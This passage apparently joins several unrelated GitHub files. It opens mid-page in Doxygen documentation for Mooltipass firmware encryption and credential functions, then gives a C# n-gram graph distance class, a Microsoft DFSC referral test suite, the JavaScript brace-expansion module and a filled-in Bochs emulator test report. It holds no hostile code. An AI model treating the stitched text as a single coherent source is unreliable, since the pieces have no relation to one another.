valign="bottom"><b>context_valid_flag</b> = FALSE</td></tr> <tr class="separator:ab689689ef283c40dc14cb0a9eef6c3b4"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a3fb26a5017ccf10f4f829bacac31429c"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a3fb26a5017ccf10f4f829bacac31429c"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>current_adding_data_flag</b> = FALSE</td></tr> <tr class="separator:a3fb26a5017ccf10f4f829bacac31429c"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:abf025b74811bbd8566306b9889bb0bbf"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="abf025b74811bbd8566306b9889bb0bbf"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>currently_adding_data_cntr</b> = 0</td></tr> <tr class="separator:abf025b74811bbd8566306b9889bb0bbf"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aa2521d127f07a04b5dcacc3fa749c569"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aa2521d127f07a04b5dcacc3fa749c569"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>currently_reading_data_cntr</b> = 0</td></tr> <tr class="separator:aa2521d127f07a04b5dcacc3fa749c569"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:af408365d698744c60ec26bebc07d6937"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="af408365d698744c60ec26bebc07d6937"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>currently_writing_first_block</b> = FALSE</td></tr> <tr class="separator:af408365d698744c60ec26bebc07d6937"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ad3cdf7b15b21ae01c1124b951a202dee"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ad3cdf7b15b21ae01c1124b951a202dee"></a> uint16_t&#160;</td><td class="memItemRight" valign="bottom"><b>next_data_node_addr</b> = 0</td></tr> <tr class="separator:ad3cdf7b15b21ae01c1124b951a202dee"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ab8b2c5ac570778010ffda6fee9c8645b"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab8b2c5ac570778010ffda6fee9c8645b"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>dataNodeCtrVal</b> [3]</td></tr> <tr class="separator:ab8b2c5ac570778010ffda6fee9c8645b"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ae3f92b27415e0682faf15d0ee22612b3"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ae3f92b27415e0682faf15d0ee22612b3"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>nextCtrVal</b> [USER_CTR_SIZE]</td></tr> <tr class="separator:ae3f92b27415e0682faf15d0ee22612b3"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a08ae65e65ac9cf19efc7961293cf139c"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a08ae65e65ac9cf19efc7961293cf139c"></a> uint16_t&#160;</td><td class="memItemRight" valign="bottom"><b>context_parent_node_addr</b></td></tr> <tr class="separator:a08ae65e65ac9cf19efc7961293cf139c"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a04e3309f660d10929cd0c93662d60348"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a04e3309f660d10929cd0c93662d60348"></a> <a class="el" href="structconfirmation_text__t.html">confirmationText_t</a>&#160;</td><td class="memItemRight" valign="bottom"><b>conf_text</b></td></tr> <tr class="separator:a04e3309f660d10929cd0c93662d60348"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a256d08589d9ed67d91ec330152879420"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a256d08589d9ed67d91ec330152879420"></a> <a class="el" href="structaes256_ctr_ctx__t.html">aes256CtrCtx_t</a>&#160;</td><td class="memItemRight" valign="bottom"><b>aesctx</b></td></tr> <tr class="separator:a256d08589d9ed67d91ec330152879420"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a52b223067ced03362bf5b08eaa63d2bd"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a52b223067ced03362bf5b08eaa63d2bd"></a> pNode&#160;</td><td class="memItemRight" valign="bottom"><b>temp_pnode</b></td></tr> <tr class="separator:a52b223067ced03362bf5b08eaa63d2bd"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ad286199dd3852f5810fc1913178a20a6"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ad286199dd3852f5810fc1913178a20a6"></a> cNode&#160;</td><td class="memItemRight" valign="bottom"><b>temp_cnode</b></td></tr> <tr class="separator:ad286199dd3852f5810fc1913178a20a6"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a5fc562dd6f553cfe3736b1dbd4598193"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a5fc562dd6f553cfe3736b1dbd4598193"></a> dNode *&#160;</td><td class="memItemRight" valign="bottom"><b>temp_dnode_ptr</b> = (dNode*)&amp;temp_cnode</td></tr> <tr class="separator:a5fc562dd6f553cfe3736b1dbd4598193"><td class="memSeparator" colspan="2">&#160;</td></tr> </table> <a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2> <div class="textblock"><p>Firmware logic - encryption and communications Created: 18/08/2014 Author: Mathieu Stephan. </p> </div><h2 class="groupheader">Function Documentation</h2> <a class="anchor" id="acba821e3c7d55c66ac7672fe3776edbf"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">addDataForDataContext </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>data</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t&#160;</td> <td class="paramname"><em>last_packet_flag</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Add 32 bytes of data to our current data parent. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">data</td><td>Block of data to add </td></tr> <tr><td class="paramname">last_packet_flag</td><td>Flag to know if it is our last packet </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns</dt><dd>Operation success or not </dd></dl> </div> </div> <a class="anchor" id="a0a33ec54fda2e3bddc3e2ada1ab41899"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">askUserForLoginAndPasswordKeybOutput </td> <td>(</td> <td class="paramtype">uint16_t&#160;</td> <td class="paramname"><em>child_address</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">char *&#160;</td> <td class="paramname"><em>service_name</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Ask the user to enter the login password of a given child. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">child_address</td><td>Address of the child </td></tr> <tr><td class="paramname">service_name</td><td>Service name </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="a853f383eaf0065dfbdb3dbcfb3eca04b"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">decrypt32bBlockOfDataAndClearCTVFlag </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>data</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>ctr</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Decrypt a block of data, clear credential_timer_valid. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">data</td><td>Data to be decrypted </td></tr> <tr><td class="paramname">ctr</td><td>Ctr value for the data </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="abe78ac5d68297cef1ed356c0741840ab"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">encrypt32bBlockOfDataAndClearCTVFlag </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>data</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>ctr</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Encrypt a block of data, clear credential_timer_valid. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">data</td><td>Data to be decrypted </td></tr> <tr><td class="paramname">ctr</td><td>Pointer to where to store the ctr </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="af605926c53e38170c91ca278dd84ae66"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">getSmartCardInsertedUnlocked </td> <td>(</td> <td class="paramtype">void&#160;</td> <td class="paramname"></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>know if the smartcard is inserted and unlocked </p> <dl class="section return"><dt>Returns</dt><dd>The state </dd></dl> </div> </div> <a class="anchor" id="a9cc73786e07d95f0a8eb1027c8b12f8b"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">initEncryptionHandling </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>aes_key</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>nonce</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Initialize our encryption/decryption part. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">aes_key</td><td>Our AES256 key </td></tr> <tr><td class="paramname">nonce</td><td>The nonce </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="adfa8333245b42cbc18827c77b09fbabe"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">initUserFlashContext </td> <td>(</td> <td class="paramtype">uint8_t&#160;</td> <td class="paramname"><em>user_id</em></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>Initialize our flash context. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">user_id</td><td>The user ID </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="ab745dd39d25124d24f134c82a7f92884"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">uint16_t searchForLoginInGivenParent </td> <td>(</td> <td class="paramtype">uint16_t&#160;</td> <td class="paramname"><em>parent_addr</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>name</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Prototypes </p> </div> </div> <a class="anchor" id="ac858e3c344d7f63ca46362e88708c41e"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">setCurrentContext </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>name</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t&#160;</td> <td class="paramname"><em>type</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Set our current context. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">name</td><td>Name of the desired service / website </td></tr> <tr><td class="paramname">type</td><td>Type of context (data or credential) </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns</dt><dd>If we found the context </dd></dl> </div> </div> <a class="anchor" id="a9c7c9fab57070ffc66fa6fcb64c0f6e0"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">setLoginForContext </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>name</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t&#160;</td> <td class="paramname"><em>length</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Set login for current context. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">name</td><td>String containing the login </td></tr> <tr><td class="paramname">length</td><td>String length </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns</dt><dd>Operation success or not </dd></dl> </div> </div> <a class="anchor" id="a13c7de9328d80459f78fa702bb0bd230"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">setPasswordForContext </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>password</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t&#160;</td> <td class="paramname"><em>length</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Set password for current context. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">password</td><td>String containing the password </td></tr> <tr><td class="paramname">length</td><td>String length </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns</dt><dd>Operation success or not </dd></dl> </div> </div> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Thu May 5 2016 10:42:40 for Mooltipass by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.11 </small></address> </body> </html>
{ "pile_set_name": "Github" }
using Improvisation.Library.Distance; using System; using System.Collections.Generic; using System.Linq; using System.Runtime.CompilerServices; using System.Text; using System.Threading.Tasks; namespace Improvisation.Library.GraphOperations { public class NGramSemanticGraphDistance<T> where T : IEquatable<T> { public float TolerancePerNode { get; set; } public float EmptyNodeWeight { get; set; } public IDistance<float> ProbabilityDistace { get; set; } public readonly Func<float, float> TransformFunction; public NGramSemanticGraphDistance() : this(new EuclideanDistance<float>(), new Func<float, float>(x => x)) { } public NGramSemanticGraphDistance(IDistance<float> e, Func<float, float> transform, float tolerance = 0F, float empty = 1F) { e.NullCheck(); transform.NullCheck(); this.TolerancePerNode = tolerance; this.EmptyNodeWeight = empty; this.ProbabilityDistace = e; this.TransformFunction = transform; } public float Distance(NGramGraphMarkovChain<T> left, NGramGraphMarkovChain<T> right, NGramGraphDistanceType type = NGramGraphDistanceType.CompleteGraph) { left.NullCheck(); right.NullCheck(); switch (type) { case NGramGraphDistanceType.CompleteGraph: return (this.DistanceCompleteWithRespectToLeft(left, right) + this.DistanceCompleteWithRespectToLeft(right, left)) / 2F; case NGramGraphDistanceType.SubGraph: if (left.Count() > right.Count()) { return this.DistanceCompleteWithRespectToLeft(right, left); } return this.DistanceCompleteWithRespectToLeft(left, right); } throw new NotImplementedException(); } private float DistanceCompleteWithRespectToLeft(NGramGraphMarkovChain<T> left, NGramGraphMarkovChain<T> right) { float sum = 0; foreach (var item in left) { var node = item.Key; if (!right.ValidNode(node)) { sum += this.ToleranceTransform(this.TransformFunction(this.EmptyNodeWeight)); continue; } var rightConnections = right.Edges(node).Select(y => this.TransformFunction(y.Probability)).ToArray(); var total = this.TransformFunction((float)this.ProbabilityDistace.Distance(item.Value.Select(x => this.TransformFunction(x.Probability)).ToArray(), rightConnections)); if (total / (float)left.Count() < this.TolerancePerNode) { sum += 0; } else { sum += total; } } return sum / (this.TransformFunction(1F) * (float)right.Grams.Count()); } [MethodImpl(MethodImplOptions.AggressiveInlining)] private float ToleranceTransform(float f) { if (f < this.TolerancePerNode) { return 0; } return f; } } }
{ "pile_set_name": "Github" }
// Copyright (c) Microsoft. All rights reserved. // Licensed under the MIT license. See LICENSE file in the project root for full license information. using Microsoft.Protocols.TestSuites.FileSharing.Common.Adapter; using Microsoft.Protocols.TestTools; using Microsoft.Protocols.TestTools.StackSdk.FileAccessService.Dfsc; using Microsoft.Protocols.TestTools.StackSdk.FileAccessService.Smb2; using Microsoft.VisualStudio.TestTools.UnitTesting; using System; namespace Microsoft.Protocols.TestSuites.FileSharing.DFSC.TestSuite { [TestClass] public class DCReferralToDC : DFSCTestBase { #region Test Suite Initialization // Use ClassInitialize to run code before running the first test in the class [ClassInitialize()] public static void ClassInitialize(TestContext testContext) { TestClassBase.Initialize(testContext); } // Use ClassCleanup to run code after all tests in a class have run [ClassCleanup()] public static void ClassCleanup() { TestClassBase.Cleanup(); } #endregion [TestMethod] [TestCategory(TestCategories.Bvt)] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [Description("Client sends a version 3 DC referral request with a valid domain name(FQDN) to DC and expects positive response.")] public void BVT_DCReferralV3ToDC() { uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a version 3 DC referral request with a valid domain name(FQDN) to DC."); DfscReferralResponsePacket respPacket = utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V3, TestConfig.ValidFQDNPath, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_SUCCESS, status, "DC Referral to DC Response has failed with status " + Smb2Status.GetStatusCode(status)); VerifyResponse(respPacket, true); } [TestMethod] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [TestCategory(TestCategories.Positive)] [Description("Client sends a v4 DC referral request EX with a valid domain name(NETBIOS) to DC and expects positive response.")] public void DCReferralV4EXNetBiosToDC() { utility.CheckEXOverSMB(); uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a v4 DC referral request EX with a valid domain name(NETBIOS) to DC."); DfscReferralResponsePacket respPacket = utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V4, TestConfig.ValidNETBIOSPath, true, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_SUCCESS, status, "DC Referral to DC Response has failed with status " + Smb2Status.GetStatusCode(status)); VerifyResponse(respPacket, false); } [TestMethod] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [TestCategory(TestCategories.Positive)] [Description("Client sends a v4 DC referral request EX with a site name to DC and expects positive response.")] public void DCReferralV4EXSiteToDC() { utility.CheckEXOverSMB(); uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a v4 DC referral request EX with a site name to DC."); DfscReferralResponsePacket respPacket = utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V4, TestConfig.ValidFQDNPath, true, true, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_SUCCESS, status, "DC Referral to DC Response has failed with status " + Smb2Status.GetStatusCode(status)); VerifyResponse(respPacket, true); } [TestMethod] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [TestCategory(TestCategories.Compatibility)] [Description("Client sends a v4 DC referral request with an invalid domain name(NETBIOS) to DC and expects negative response.")] public void InvalidDCReferralToDC() { uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a v4 DC referral request with an invalid domain name(NETBIOS) to DC."); utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V4, "\\" + DFSCTestUtility.Consts.InvalidComponent, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_INVALID_PARAMETER, status, "Expected Invalid DC Referral to DC Response is STATUS_INVALID_PARAMETER, but real status is " + Smb2Status.GetStatusCode(status)); } [TestMethod] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [TestCategory(TestCategories.Compatibility)] [Description("Client sends a v1 DC referral request to DC and expects negative response.")] public void DCReferralV1ToDC() { uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a v1 DC referral request to DC."); utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V1, TestConfig.ValidFQDNPath, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_UNSUCCESSFUL, status, "Expected DC Referral v1 to DC Response is STATUS_UNSUCCESSFUL, but real status is " + Smb2Status.GetStatusCode(status)); } [TestMethod] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [TestCategory(TestCategories.Compatibility)] [Description("Client sends a v2 DC referral request to DC and expects negative response.")] public void DCReferralV2ToDC() { uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a v2 DC referral request to DC."); utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V2, TestConfig.ValidFQDNPath, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_UNSUCCESSFUL, status, "Expected DC Referral v1 to DC Response is STATUS_UNSUCCESSFUL, but real status is " + Smb2Status.GetStatusCode(status)); } /// <summary> /// Verify response of DC referral request /// </summary> /// <param name="respPacket">Response packet of DC referral request</param> /// <param name="fqdnOrNetbios">If the domain name is FQDN format or NetBIOS format</param> private void VerifyResponse(DfscReferralResponsePacket respPacket, bool fqdnOrNetbios) { BaseTestSite.Assert.AreEqual((ushort)0, respPacket.ReferralResponse.PathConsumed, "PathConsumed must be set to 0"); BaseTestSite.Assert.AreEqual((ushort)0x0001, respPacket.ReferralResponse.NumberOfReferrals, "NumberOfReferrals must be set to 1"); DFS_REFERRAL_V3V4_NameListReferral[] respV3 = client.RetrieveReferralEntries<DFS_REFERRAL_V3V4_NameListReferral>(respPacket, (ushort)ReferralEntryType_Values.DFS_REFERRAL_V3); uint timeToLive = respV3[0].TimeToLive; bool containValidDC = false; string expectedDCName; string expectedSpecialName; if (fqdnOrNetbios) { expectedDCName = string.Format(@"\{0}.{1}", TestConfig.DCServerName, TestConfig.DomainFQDNName); expectedSpecialName = TestConfig.ValidFQDNPath; } else { expectedDCName = @"\" + TestConfig.DCServerName; expectedSpecialName = TestConfig.ValidNETBIOSPath; } foreach (DFS_REFERRAL_V3V4_NameListReferral entry in respV3) { if (!containValidDC) { foreach (string dcName in entry.DCNameArray) { BaseTestSite.Log.Add(LogEntryKind.Debug, "DC name is {0}", dcName); containValidDC = dcName.Equals(expectedDCName, StringComparison.OrdinalIgnoreCase); } } BaseTestSite.Assert.AreEqual(expectedSpecialName, entry.SpecialName, @"SpecialName must be \" + expectedSpecialName); BaseTestSite.Assert.AreEqual(timeToLive, entry.TimeToLive, "TimeToLive must be the same"); BaseTestSite.Assert.AreEqual((ushort)ReferralEntryType_Values.DFS_REFERRAL_V3, entry.VersionNumber, "VersionNumber must be set to " + ReferralEntryType_Values.DFS_REFERRAL_V3.ToString()); BaseTestSite.Assert.AreEqual(ReferralEntryFlags_Values.NameListReferral, entry.ReferralEntryFlags, "NameListReferral MUST be set to 1 for DC referral"); timeToLive = entry.TimeToLive; } BaseTestSite.Assert.IsTrue(containValidDC, "DCName must be " + expectedDCName); } } }
{ "pile_set_name": "Github" }
var concatMap = require('concat-map'); var balanced = require('balanced-match'); module.exports = expandTop; var escSlash = '\0SLASH'+Math.random()+'\0'; var escOpen = '\0OPEN'+Math.random()+'\0'; var escClose = '\0CLOSE'+Math.random()+'\0'; var escComma = '\0COMMA'+Math.random()+'\0'; var escPeriod = '\0PERIOD'+Math.random()+'\0'; function numeric(str) { return parseInt(str, 10) == str ? parseInt(str, 10) : str.charCodeAt(0); } function escapeBraces(str) { return str.split('\\\\').join(escSlash) .split('\\{').join(escOpen) .split('\\}').join(escClose) .split('\\,').join(escComma) .split('\\.').join(escPeriod); } function unescapeBraces(str) { return str.split(escSlash).join('\\') .split(escOpen).join('{') .split(escClose).join('}') .split(escComma).join(',') .split(escPeriod).join('.'); } // Basically just str.split(","), but handling cases // where we have nested braced sections, which should be // treated as individual members, like {a,{b,c},d} function parseCommaParts(str) { if (!str) return ['']; var parts = []; var m = balanced('{', '}', str); if (!m) return str.split(','); var pre = m.pre; var body = m.body; var post = m.post; var p = pre.split(','); p[p.length-1] += '{' + body + '}'; var postParts = parseCommaParts(post); if (post.length) { p[p.length-1] += postParts.shift(); p.push.apply(p, postParts); } parts.push.apply(parts, p); return parts; } function expandTop(str) { if (!str) return []; // I don't know why Bash 4.3 does this, but it does. // Anything starting with {} will have the first two bytes preserved // but *only* at the top level, so {},a}b will not expand to anything, // but a{},b}c will be expanded to [a}c,abc]. // One could argue that this is a bug in Bash, but since the goal of // this module is to match Bash's rules, we escape a leading {} if (str.substr(0, 2) === '{}') { str = '\\{\\}' + str.substr(2); } return expand(escapeBraces(str), true).map(unescapeBraces); } function identity(e) { return e; } function embrace(str) { return '{' + str + '}'; } function isPadded(el) { return /^-?0\d/.test(el); } function lte(i, y) { return i <= y; } function gte(i, y) { return i >= y; } function expand(str, isTop) { var expansions = []; var m = balanced('{', '}', str); if (!m || /\$$/.test(m.pre)) return [str]; var isNumericSequence = /^-?\d+\.\.-?\d+(?:\.\.-?\d+)?$/.test(m.body); var isAlphaSequence = /^[a-zA-Z]\.\.[a-zA-Z](?:\.\.-?\d+)?$/.test(m.body); var isSequence = isNumericSequence || isAlphaSequence; var isOptions = m.body.indexOf(',') >= 0; if (!isSequence && !isOptions) { // {a},b} if (m.post.match(/,.*\}/)) { str = m.pre + '{' + m.body + escClose + m.post; return expand(str); } return [str]; } var n; if (isSequence) { n = m.body.split(/\.\./); } else { n = parseCommaParts(m.body); if (n.length === 1) { // x{{a,b}}y ==> x{a}y x{b}y n = expand(n[0], false).map(embrace); if (n.length === 1) { var post = m.post.length ? expand(m.post, false) : ['']; return post.map(function(p) { return m.pre + n[0] + p; }); } } } // at this point, n is the parts, and we know it's not a comma set // with a single entry. // no need to expand pre, since it is guaranteed to be free of brace-sets var pre = m.pre; var post = m.post.length ? expand(m.post, false) : ['']; var N; if (isSequence) { var x = numeric(n[0]); var y = numeric(n[1]); var width = Math.max(n[0].length, n[1].length) var incr = n.length == 3 ? Math.abs(numeric(n[2])) : 1; var test = lte; var reverse = y < x; if (reverse) { incr *= -1; test = gte; } var pad = n.some(isPadded); N = []; for (var i = x; test(i, y); i += incr) { var c; if (isAlphaSequence) { c = String.fromCharCode(i); if (c === '\\') c = ''; } else { c = String(i); if (pad) { var need = width - c.length; if (need > 0) { var z = new Array(need + 1).join('0'); if (i < 0) c = '-' + z + c.slice(1); else c = z + c; } } } N.push(c); } } else { N = concatMap(n, function(el) { return expand(el, false) }); } for (var j = 0; j < N.length; j++) { for (var k = 0; k < post.length; k++) { var expansion = pre + N[j] + post[k]; if (!isTop || isSequence || expansion) expansions.push(expansion); } } return expansions; }
{ "pile_set_name": "Github" }
What is the date? [5/29/2001] What is your name? [Bryce Denney] What is your email address? [bryce dot denney at bigfoot dot com] Do you mind if your name and email address are placed on a testing results web page so that people with a similar setup can write to you? [X] Ok, put it on a web page [ ] No, keep my address private. What type of hardware are you using, e.g. 500MHz Intel Celeron. [PowerPC G4 with 384meg RAM] What operating system are you using? Please be specific, e.g. Redhat Linux 6.2 with 2.2.16 kernel. [MacOS X, build 3K78] What version of bochs are you using? [ ] compiled from version 1.0 (3/25/2000 snapshot) [ ] compiled from version 1.1 (bugfix1) [ ] compiled from version 1.1.1 (bugfix2) [ ] compiled from version 1.1.2 (bugfix3) [X] compiled from version 1.2-pre1 [ ] I compiled it from the CVS sources from date: [__] [ ] other source distribution from URL: [__] [ ] binary distribution from URL: [__] Please fill in the next few questions only if you compiled Bochs yourself, as opposed to downloading a binary. Did the configure script run ok, and detect your hardware and operating system? [ ] Yes [ ] No, configure crashed. [X] No, configure ran ok but produced a bad configuration. [ ] No, I cannot run configure on my platform (win32 and mac). If you used configure, what arguments did you give it? If you used a .conf.* script, give the name of the .conf script instead. [ NOTE: This was done on a system that has no X windows libraries! ./configure (no args): it said it could not find X windows libraries, then it set itself up for X windows anyway. This failed of course. If I install X windows I'll try it again. ./configure --with-term: could not find mvaddch in any of the three libraries it searched (curses, ncurses, termlib). So I changed configure.in to search for waddch instead of mvwaddch, ran autoconf again, and it said that waddch is found in curses. However it still will not build because of a few missing functions: keypad(), set_curs(), and nodelay(). It's only complaining about "implicit declaration" of these; they may actually be in the library but not the header? ./configure --with-rfb: worked great! Not tested much though. ] What compiler did you use? (Please include version.) [Reading specs from /usr/libexec/gcc/darwin/ppc/2.95.2/specs Apple Computer, Inc. version gcc-926, based on gcc version 2.95.2 19991024 (release) ] Did Bochs compile clean without any hacking? [X] Yes, once I started using RFB mode. [ ] No If you had to make changes to compile, please summarize the problems you had or include diffs. [./configure --with-rfb works fine X will probably be ok if I ever install it. ] End of compile-specific questions! What guest operating system are you using inside bochs? [4meg linux image from web site] Are you booting from a floppy or hard disk? [ ] floppy image [ ] raw floppy drive [X] hard drive image [ ] raw hard drive (is this even possible?) [ ] other [__] Did the guest operating system boot successfully? [X] Yes [ ] No If no, what error messages do you see on the console or in the log file? [__] What applications worked under this guest operating system? [not time to run many, this machine is very slow] What applications failed under this guest operating system? Did the application function incorrectly, crash Bochs, or what? If you got a panic, paste in the panic message that you received with some description of what was happening at the time. [none yet] The remaining questions are about Bochs features that you may not have used. If you tried out the feature, move the X to the "works" or "fails" column. Not Works tested ok Fails Comments? floppy disk [X] [ ] [ ] [__] raw floppy disk [X] [ ] [ ] [__] hard disk [ ] [X] [ ] [__] floating point [X] [ ] [ ] [__] mouse [X] [ ] [ ] [__] cdrom [X] [ 